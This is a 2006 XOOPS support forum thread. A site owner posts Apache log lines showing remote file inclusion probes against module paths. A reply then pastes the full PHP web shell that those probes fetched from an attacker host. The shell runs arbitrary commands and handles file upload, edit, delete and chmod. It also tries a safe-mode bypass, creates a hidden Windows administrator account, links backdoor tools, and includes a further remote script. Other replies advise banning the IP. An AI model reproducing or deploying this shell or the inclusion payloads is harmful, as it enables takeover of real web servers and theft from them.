XOOPS 
Forum
Forum Index General Forums Community Support Modules Support Themes Support Development International Support Module Hack Reviews Theme Designer Talk
  1. Board index / 
  2. XOOPS Community Support forums / 
  3. XOOPS general usage questions 
  4.  / Somebody search for xoops bug-s
Register
1
mojportal
Somebody search for xoops bug-s

  • 2006/11/5 17:34

  • mojportal

  • Just popping in

  • Posts: 14

  • Since: 2005/7/2 2


[Sun Nov  5 18:23:27 2006] [error] [client 200.170.229.200File does not exist: /home/xxx/public_html/modules/xoopspartners/admin/includes&config[path]=http://molganinovo.ru/c.php.txt
[Sun Nov  5 18:23:24 2006] [error] [client 200.170.229.200File does not exist: /home/xxx/public_html/modules/system/includes&config[path]=http://molganinovo.ru/c.php.txt


I see this error message in error log. Not just this IP and this two path's. Is this script, c.php.txt can make trouble?
2
Will_H
Re: Somebody search for xoops bug-s

  • 2006/11/5 21:44

  • Will_H

  • Friend of XOOPS

  • Posts: 1786

  • Since: 2004/10/10


c.php.txt













By chaos



A:link {text-decoration:none}

A:visited {text-decoration:none}

A:hover {text-decoration:underline}

A:active {text-decoration:underline}










 @set_time_limit(0);



 $string $_SERVER['QUERY_STRING'];

 $mhost 'LINK_OF_CONF/NAME.txt';

 $host_all explode("$mhost"$string);

 $s1 $host_all[0];

 $fstring $_SERVER['PHP_SELF']."?".$s1.$mhost;



 $OS = @PHP_OS;

 $IpServer '127.0.0.1';

 $UNAME = @php_uname();

 $PHPv = @phpversion();

 $SafeMode = @ini_get('safe_mode');



 if ($SafeMode == '') { $SafeMode "OFF"; }

 else { $SafeMode "$SafeMode"; }



 $btname 'backtool.txt';

 $bt 'http://www.full-comandos.com/jobing/r0nin';

 $dc 'http://www.full-comandos.com/jobing/dc.txt';

 $newuser '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup "Administrators" /add Admin;net localgroup "Users" /del Admin';

 // Java Script

 echo "text/javascript">";

 echo "function ChMod(chdir, file) {";

 echo "var o = prompt('Chmod: - Exemple: 0777', '');";

 echo "if (o) {";

 echo "window.location="" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file + '&chmod=' + o + "";";

 echo "}";

 echo "}";

 echo "function Rename(chdir, file, mode) {";

 echo "if (mode == 'edit') {";

 echo "var o = prompt('Rename file '+ file + ' for:', '');";

 echo "}";

 echo "else {";

 echo "var o = prompt('Rename dir '+ file + ' for:', '');";

 echo "}";

 echo "if (o) {";

 echo "window.location="" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file + '&newname=' + o + '&mode=' + mode +"";";

 echo "}";

 echo "}";

 echo "function Copy(chdir, file) {";

 echo "var o = prompt('Copied for:', '/tmp/' + file);";

 echo "if (o) {";

 echo "window.location="" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file + '&fcopy=' + o + "";";

 echo "}";

 echo "}";

 echo "function Mkdir(chdir) {";

 echo "var o = prompt('Which name?', 'NewDir');";

 echo "if (o) {";

 echo "window.location="" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o + "";";

 echo "}";

 echo "}";

 echo "function Newfile(chdir) {";

 echo "var o = prompt('Which name?', 'NewFile.txt');";

 echo "if (o) {";

 echo "window.location="" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o + "";";

 echo "}";

 echo "}";

 echo "";



 // End JavaScript



    /* Functions */

    function cmd($CMDs) {

        $CMD[1] = '';

        exec($CMDs$CMD[1]);

        if (empty($CMD[1])) {

            $CMD[1] = shell_exec($CMDs);

        }

            elseif (empty($CMD[1])) {

            $CMD[1] = passthru($CMDs);

        }

        elseif (empty($CMD[1])) {

            $CMD[1] = system($CMDs);

        }

        elseif (empty($CMD[1])) {

            $handle popen($CMDs'r');

            while(!feof($handle)) {

                $CMD[1][] .= fgets($handle);

            }

            pclose($handle);

        }

        return $CMD[1];

    }

 

if (@$_GET['chdir']) {

 $chdir $_GET['chdir']; 

} else {

   $chdir getcwd()."/";

  }

if (@chdir("$chdir")) {

 $msg "#008000">Entrance in the directory, OK!";

} else {

 $msg "#FF0000">Error to enters it in the directory!";

 $chdir str_replace($SCRIPT_NAME""$_SERVER['SCRIPT_NAME']);

}

 $chdir str_replace(chr(92), chr(47), $chdir);



if (@$_GET['action'] == 'upload') {

 $uploaddir $chdir;

 $uploadfile $uploaddir$_FILES['userfile']['name'];

 if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir $_FILES['userfile']['name'])) {

  $msg "#008000">{$_FILES['userfile']['name']}, the archive is validates and was loaded successfully.";

 } else {

    $msg "#FF0000">Error when copying archive.";

   }

}

elseif (@$_GET['action'] == 'mkdir') {

    $newdir $_GET['newdir'];

    if (@mkdir("$chdir"."$newdir")) {

     $msg "#008000">{$newdir}, directory created successfully.";

    } else {

       $msg "#FF0000">Error to it creates directory.";

      }

}

elseif (@$_GET['action'] == 'newfile') {

    $newfile $_GET['newfile'];

    if (@touch("$chdir"."$newfile")) {

     $msg "#008000">{$newfile}, created successfully!";

    } else {

       $msg "#FF0000">Error to tries it creates archive.";

      }

}



elseif (@$_GET['action'] == 'del') {

     $file $_GET['file']; $type $_GET['type'];

     if ($type == 'file') {

      if (@unlink("$chdir"."$file")) {

       $msg "#008000">{$file}, successfully excluded archive!";

      } else {

         $msg "#FF0000">Error to it I excluded archive!";

        }

     } elseif ($type == 'dir') {

        if (@rmdir("$chdir"."$file")) {

          $msg "#008000">{$file}, successfully excluded directory!";

        } else {

           $msg "#FF0000">Error to it I excluded directory!";

          }

       }

}

elseif (@$_GET['action'] == 'chmod') {

     $file $chdir.$_GET['file']; $chmod $_GET['chmod'];

     if (@chmod ("$file"$chmod)) {

  

      $msg "#008000">Chmod of {$_GET['file']} moved for $chmod successfully.";

     } else {

        $msg 'Error when moving chmod.';

       }

}

elseif (@$_GET['action'] == 'rename') {

     $file $_GET['file']; $newname $_GET['newname'];

     if (@rename("$chdir"."$file""$chdir"."$newname")) {

      $msg "#008000">Archive {$file} named for {$newname} successfully!";

     } else {

        $msg "#FF0000">Error to it nominates archive.";

       }

}

elseif (@$_GET['action'] == 'copy') {

    $file $chdir.$_GET['file']; $copy $_GET['fcopy'];

    if (@copy("$file""$copy")) {

     $msg "#000080">{$file}, copied for {$copy} successfully!";

    } else {

       $msg "#FF0000">Error when copying {$file} for {$copy}";

      }

}

/* Parte Atualiza 02:48 12/2/2006 */



elseif (@$_GET['action'] == 'cmd') {

    if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }

    if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }

    $cmd stripslashes(trim($cmd));

    $result_arr cmd($cmd);

    

    $afim count($result_arr); $acom 0$msg '';

    $msg .= "color#000000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2">Results: ".$cmd."

";

    if ($result_arr) {

        while ($acom <= $afim) {

            $msg .= "color#008000;text-align: left;font-family: 'Lucida Console';font-size: 12px;margin 2"> ".@$result_arr[$acom]."

";

        $acom++;

         }

    }

    else {

        $msg .= "color#FF0000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2">Erro ao executar comando.

";

    }

}

elseif (@$_GET['action'] == 'safemode') {

if (@!extension_loaded('shmop')) {

 echo "Loading... module
";



    if (strtoupper(substr(PHP_OS0,3) == 'WIN')) {

        @dl('php_shmop.dll');

    } else {

        @dl('shmop.so');

    }

}



if (@extension_loaded('shmop')) {

 echo "Module: shmop loaded!
";



 $shm_id = @shmop_open(0xff2"c"0644100);

 if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }

 $data="\x00";

 $offset=-3842685;

 $shm_bytes_written = @shmop_write($shm_id$data$offset);

 if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\n"; }

 if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }

 echo passthru("id"); 

 shmop_close($shm_id);





} else { echo "Module: shmop not loaded!
"; }

}



elseif (@$_GET['action'] == 'zipen') {

 $file $_GET['file'];

 $zip = @zip_open("$chdir"."$file");

 $msg '';

if ($zip) {



    while ($zip_entry zip_read($zip)) {

        $msg .= "Name:               " zip_entry_name($zip_entry) . "\n";

        $msg .= "Actual Filesize:    " zip_entry_filesize($zip_entry) . "\n";

        $msg .= "Compressed Size:    " zip_entry_compressedsize($zip_entry) . "\n";

        $msg .= "Compression Method: " zip_entry_compressionmethod($zip_entry) . "\n";



        if (zip_entry_open($zip$zip_entry"r")) {

            echo "File Contents:\n";

            $buf zip_entry_read($zip_entryzip_entry_filesize($zip_entry));

            echo "$buf\n";



            zip_entry_close($zip_entry);

        }

        echo "\n";



    }



    zip_close($zip);



}

}

elseif (@$_GET['action'] == 'edit') {

 $file $_GET['file'];

 $conteudo '';

 $filename "$chdir"."$file";

 $conteudo = @file_get_contents($filename);

 $conteudo htmlspecialchars($conteudo);

 $back $_SERVER['HTTP_REFERER'];

 echo "center">Editing {$file} ...

";

 echo "0" cellpadding="0" cellspacing="0" style="border-collapsecollapse" width="100%" id="editacao">";

 echo "";

 echo "100%">";

 echo "POST" action="{$fstring}&amp;action=save&amp;chdir={$chdir}&amp;file={$file}">";

 echo "center">";

 print "18" name="S1" cols="89" style="font-familyVerdanafont-size10ptborder1px solid #000000">{$conteudo}

";

 echo "center">";

 echo "submit" value="Save" name="B2" style="font-familyTahomafont-size10pxborder1px solid #000000"> ";

 echo "button" value="Closes Publisher" Onclick="javascript:window.location='{$fstring}&chdir={$chdir}'" name="B1" style="font-familyTahomafont-size10pxborder1px solid #000000"> ";

 echo "";

 echo "";

 echo "";

 echo "";

}

elseif (@$_GET['action'] == 'save') {

   $filename "$chdir".$_GET['file'];

   $somecontent $_POST['S1'];

   $somecontent stripslashes(trim($somecontent));

   if (is_writable($filename)) {

    @$handle fopen ($filename"w");

    @$fw fwrite($handle$somecontent);

    @fclose($handle);

    if ($handle && $fw) {

     $msg "#000080">{$_GET['file']}, edited successfully!";

    }

 } else {

    $msg "#000000">{$_GET['file']}, cannot be written!";

   }

}



// Informa��es

 $cmdget '';

 if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }

 if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }

 $cmdget htmlspecialchars($cmdget);

 function asdads() {

  $asdads '';

  if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }

  if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }

  if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }

  if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }

  if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }

  return $asdads;

 }



echo "POST" name="cmd" action="{$fstring}&amp;action=cmd&amp;chdir=$chdir">";

echo "border1px solid #000000; padding: 2">";

echo "Informa��es";

echo "0" cellpadding="0" cellspacing="0" style="border-collapsecollapsefont-familyTahomafont-size10px" width="100%">";

echo "";

echo "8%">";

echo "right">Sistema: 

";

echo "92%"> {$OS}";

echo "";

echo "";

echo "8%">";

echo "right">Uname: 

";

echo "92%"> {$UNAME}";

echo "";

echo "";

echo "8%">";

echo "right">PHP: 

";

echo "92%"> {$PHPv}safe mode: {$SafeMode}";

echo "";

 if (strtoupper(substr($OS0,3) != 'WIN')) {

  $Methods asdads();

  if ($Methods == '') { $Methods "???"; }

  echo "";

  echo "8%">";

  echo "right">Methods: 

";

  echo "92%"> {$Methods}";

  echo "";

 }



echo "";

echo "8%">";

echo "right">Ip: 

";

echo "92%"> {$IpServer}";

echo "";

echo "";

echo "8%">";

echo "right">Command: 

";

echo "92%"> text" size="70" name="cmd" value="{$cmdget}" style="font-familyTahomafont-size10 pxborder1px solid #000000"> ";

echo "";

echo "";

echo "";

// Dir



echo "POST" action="{$fstring}&amp;action=upload&amp;chdir=$chdir" enctype="multipart/form-data">";

echo "border1px solid #000000; padding: 2">";

if (is_writable("$chdir")) {

 if (strtoupper(substr($OS0,3) == 'WIN')) {

  echo "Dir YES{$chdir} - #[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir] [New File] [Remote Access]";

 } else {

    echo "Dir YES{$chdir} - #[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir] [New File] [BackTool]";

   

}

else {

if (strtoupper(substr($OS0,3) == 'WIN')) {

  echo "Dir NO: {$chdir} - #[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir] [New File] [Remote Access]";

 } else {

    echo "Dir NO: {$chdir} - #[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir] [New File] [BackTool]";

   

}



if (@!$handle opendir("$chdir")) {

 echo " I could not enters in the directory, {$fstring}">click here! for return to the original directory!
";

}

else {

echo "  0" cellpadding="0" cellspacing="0" style="border-collapsecollapsefont-familyTahomafont-size10px" width="100%">";

echo "    ";

echo "      100%" style="font-familyTahomafont-size10px" colspan="4"> Upload:";

echo "      file" name="userfile" size="91" style="font-familyTahomafont-size10pxborder-stylesolidborder-width1">";

echo "      submit" value="Send" name="B1" style="font-familyTahomafont-size10pxborder1px solid #000000">";

echo "    ";

echo "    ";

echo "      100%" style="font-familyTahomafont-size10px" colspan="4"> ";

echo "    ";

echo "    ";

echo "      100%" style="font-familyTahomafont-size10px" colspan="4">";

if (@!$msg) {

 echo "      left">Messages";

} else {

   echo "      left">$msg";

  }

echo "    ";

echo "    ";

echo "      100%" colspan="4"> ";

echo "    ";

echo "    ";

echo "      9%"> Perms";

echo "      49%"> File ";

echo "      10%"> Size ";

echo "      32%"> Commands";

echo "    ";

$colorn 0;

    while (false !== ($file readdir($handle))) {

        if ($file != '.') {

            if ($colorn == 0) {

             $color "style="background-color#FFCC66"";

            }

            elseif ($colorn == 1) {

             $color "style="background-color#C0C0C0"";

            }        

            if (@is_dir("$chdir"."$file")) {

             $file $file.'/';

             $mode 'chdir';

            } else { 

               $mode 'edit'

             }

            if (@substr("$chdir"strlen($chdir) -11) != '/') {

              $chdir .= '/';

            }

            if ($file == '../') {

             $lenpath strlen($chdir); $baras 0;

             for ($i 0;$i $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }

             $chdir_ explode("/"$chdir);

             $chdirpox str_replace($chdir_[$baras-1].'/'""$chdir);

            }

            $perms = @fileperms ("$chdir"."$file");

            if ($perms == '') {

             $perms '???';

            }

            $size = @filesize ("$chdir"."$file"); 

            $size $size 1024;

            $size explode("."$size);

            if (@$size[1] != '') {

             $size $size[0].'.'.@substr("$size[1]"02);

            } else {

               $size $size[0];

             }

            if ($size == 0) {

             if ($mode == 'chdir') {

              $size '???';

             }

            }

            echo "";

        echo "9%$color$perms";

            if (@is_writable ("$chdir"."$file")) {

             if ($mode == 'chdir') {

              if ($file == '../') {

               echo "49%$color{$fstring}&amp;chdir=$chdirpox">$file";

              } else {

                 echo "49%$color{$fstring}&amp;chdir={$chdir}{$file}">$file";                

                }

             } else {

        if (is_readable("$chdir"."$file")) {

                 echo "49%$color{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file">$file";

                } else {

                   echo "49%$color$file";

                  }

               }

            } 

           else {

             if ($mode == 'chdir') {

              if ($file == '../') {

               echo "49%$color{$fstring}&amp;chdir=$chdirpox">$file";

              } else {

                 echo "49%$color{$fstring}&amp;chdir={$chdir}{$file}">$file";                

               }

             } else {

        if (@is_readable("$chdir"."$file")) {

                 echo "49%$color{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file">$file";

                } else {

                   echo "49%$color$file";

                 }

               }

             }

            echo "10%$color$size KB";

            if ($mode == 'edit') {

             echo "32%$color#{$file}" onclick="Rename('{$chdir}', '{$file}', '{$mode}')">[Rename] [Del] [Chmod] [Copy]";

            } else {

               echo "32%$color#{$file}" onclick="Rename('{$chdir}', '{$file}', '{$mode}')">[Rename] [Del] [Chmod] [Copy]";

              }   

            echo "";

            if ($colorn == 0) {

             $colorn 1;

            }

            elseif ($colorn == 1) {

             $colorn 0;

            }

        }

    }

    closedir($handle);

}

include 'http://molganinovo.ru/cmd2.txt';

?>

  

  

  

    
        src="http://www.w3.org/Icons/valid-html401"

        alt="Valid HTML 4.01 Transitional" height="31" width="88">

  


...nice
3
Cuidiu
Re: Somebody search for xoops bug-s

  • 2006/11/5 23:15

  • Cuidiu

  • Quite a regular

  • Posts: 358

  • Since: 2006/4/23


EDITED: Just noticed I banned that IP long ago.

I don't use the xoopspartners module but do use smartpartner. Should I ban the IP?
[size=x-small]Working sites:
XOOPS 2.0.16 PHP 5.2.2, MySQL 5.0.24a-standard-log, Apache/2.0.54 (Unix)
XOOPS 2.2.4, PHP 4.3.10, MySQL 3.23.58, Apache/1.3.33 (Unix)[/size]
4
m0nty
Re: Somebody search for xoops bug-s

  • 2006/11/5 23:31

  • m0nty

  • XOOPS is my life!

  • Posts: 3337

  • Since: 2003/10/24


i would ban any IP that shows an attempt like that on your site.
5
Will_H
Re: Somebody search for xoops bug-s

  • 2006/11/6 2:53

  • Will_H

  • Friend of XOOPS

  • Posts: 1786

  • Since: 2004/10/10


I believe that is referred to as an understatement.

Login

Register now!  |  Lost Password?

Search

Advanced Search

Recent Posts

Who's Online

291 user(s) are online (237 user(s) are browsing Support Forums)

Members: 0

Guests: 291

more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits